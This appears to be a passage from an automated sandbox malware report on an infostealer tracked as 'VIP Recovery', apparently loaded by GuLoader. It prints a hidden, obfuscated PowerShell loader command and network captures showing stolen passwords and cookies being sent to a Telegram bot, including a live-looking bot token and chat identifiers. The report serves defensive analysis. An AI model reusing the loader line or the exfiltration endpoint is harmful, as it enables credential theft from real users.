                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:38 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847847
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iaOQaIqodSAqAWemu4jYXe2Xl3%2BXUrKTlFsDRG6UBIHJif2HvZqOHZDNKJwuCKSQerUazS4IRcQWxMzmtyU4iLgVSBC3HAl%2FdtQbcCCX8594N9S5lFvm7LYCLpBjPFrYaZI2aAvw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa3c7e02c32e-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1584&rtt_var=713&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1416100&cwnd=178&unsent_bytes=0&cid=2e1b36c4f8b694d9&ts=133&x=0"
                                                                                                                                                                          2025-01-10 18:17:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          7192.168.2.549990104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:40 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:39 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847849
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WT8tjbhyWRyHTOZnZ3dkFyTReCcASLAB5yzZu%2FaJUOyPZWGUiqAuxc9oyjY6ry24nM4sdgQ9%2BmbtXvYj%2FwOdWO%2Bqqv9wUE7Iqoa%2F6zqqs4WaBmr8BikklC8UFRL9b%2Fu85z%2BMvbTU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa48ba3bde9a-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1551&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1801357&cwnd=209&unsent_bytes=0&cid=48cc8ca009c75a54&ts=141&x=0"
                                                                                                                                                                          2025-01-10 18:17:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          8192.168.2.549992104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:42 UTC851INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:42 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847851
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sijm5oXblDvTlUgYyXtB95OJIjXuet6aDsnr8t3%2BYuZTix29GbhhIJw3I7O42y9CM5XZ4WkgV2l76wXv1CLexf3Vx5IiGBoBONHVM2QdjVloaaj50yRLBp43AAFG6htgEh0NJnIp"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa583ade4363-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1548&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1835323&cwnd=240&unsent_bytes=0&cid=86a6f808a7e38014&ts=148&x=0"
                                                                                                                                                                          2025-01-10 18:17:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          9192.168.2.549994104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:44 UTC863INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:44 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847853
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7xBOCIdqZ6j4elE0TBKad7xBYksCqCg%2FxDS97MJJD%2BXOlsxJNTj4y%2BXKI1Q4tpD9%2BHSBA2f6%2FOqQx%2FqLlM6VjPZfs5eM7mSwN2fjmDG%2FPDaDdZykKytgPC6fZGLWCjuVN0wbfmXI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa667f2472a4-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2242&min_rtt=2012&rtt_var=919&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1451292&cwnd=212&unsent_bytes=0&cid=33caa6d40fc17a8e&ts=163&x=0"
                                                                                                                                                                          2025-01-10 18:17:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          10192.168.2.549996104.21.96.14431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:46 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:46 GMT
                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                          Content-Length: 362
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Age: 1847855
                                                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                                                          cf-cache-status: HIT
                                                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0kNMfVbtaCnh0g5eShEnTaqNr0Xg0khNNbPdLbQvHKYEE8f4A78BZcw51pf%2BX%2FnCQMFaConHuZmXlfiO9wUiMfywRPwDsiNmLd8tIzvQJ11xwR8cWNxCQk7VpxxtEf4o7cvHsqiP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8ffeaa6e788c4363-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1592&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1810291&cwnd=240&unsent_bytes=0&cid=8a43b0163b03af04&ts=142&x=0"
                                                                                                                                                                          2025-01-10 18:17:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          11192.168.2.549997149.154.167.2204431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/01/2025%20/%2007:46:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          2025-01-10 18:17:47 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:47 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2025-01-10 18:17:47 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          12192.168.2.549998149.154.167.2204431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:53 UTC346OUTPOST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd3278838ce892
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Content-Length: 582
                                                                                                                                                                          2025-01-10 18:17:53 UTC582OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 37 38 38 33 38 63 65 38 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 38 30 31 30 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20 2f 20 31 33 3a 31 37 3a 32 38
                                                                                                                                                                          Data Ascii: --------------------------8dd3278838ce892Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:980108Date and Time: 10/01/2025 / 13:17:28
                                                                                                                                                                          2025-01-10 18:17:54 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:54 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 538
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2025-01-10 18:17:54 UTC538INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 34 35 37 35 31 39 31 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 61 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 32 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 39 35 30 36 31 39 37 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 62 75 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 69 7a 7a 69 5f 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 33 30 37 34 2c
                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":2592,"from":{"id":7745751910,"is_bot":true,"first_name":"Apache","username":"Chinelo22bot"},"chat":{"id":7695061973,"first_name":"Chinelo","last_name":"Ifebuche","username":"alizzi_22","type":"private"},"date":1736533074,


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          13192.168.2.550000149.154.167.2204431292C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2025-01-10 18:17:56 UTC352OUTPOST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=------------------------8dd3298cde51afd
                                                                                                                                                                          Host: api.telegram.org
                                                                                                                                                                          Content-Length: 1279
                                                                                                                                                                          2025-01-10 18:17:56 UTC1279OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 32 39 38 63 64 65 35 31 61 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 38 30 31 30 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 30 2f 30 31 2f 32 30 32 35 20
                                                                                                                                                                          Data Ascii: --------------------------8dd3298cde51afdContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:980108Date and Time: 10/01/2025
                                                                                                                                                                          2025-01-10 18:17:56 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                                                          Date: Fri, 10 Jan 2025 18:17:56 GMT
                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                          Content-Length: 549
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                          2025-01-10 18:17:56 UTC549INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 34 35 37 35 31 39 31 30 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 70 61 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 32 32 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 36 39 35 30 36 31 39 37 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 6e 65 6c 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 49 66 65 62 75 63 68 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 69 7a 7a 69 5f 32 32 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 33 30 37 36 2c
                                                                                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":2593,"from":{"id":7745751910,"is_bot":true,"first_name":"Apache","username":"Chinelo22bot"},"chat":{"id":7695061973,"first_name":"Chinelo","last_name":"Ifebuche","username":"alizzi_22","type":"private"},"date":1736533076,


                                                                                                                                                                          Statistics

                                                                                                                                                                          CPU Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          Memory Usage

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                          Behavior

                                                                                                                                                                          Click to jump to process

                                                                                                                                                                          System Behavior

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:0
                                                                                                                                                                          Start time:13:16:36
                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                          Path:C:\Users\user\Desktop\fGu8xWoMrg.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\fGu8xWoMrg.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:1'119'496 bytes
                                                                                                                                                                          MD5 hash:487FAD16DA392C87FB894A6CCBD95870
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:2
                                                                                                                                                                          Start time:13:16:39
                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "
                                                                                                                                                                          Imagebase:0xed0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2521881649.0000000009B31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
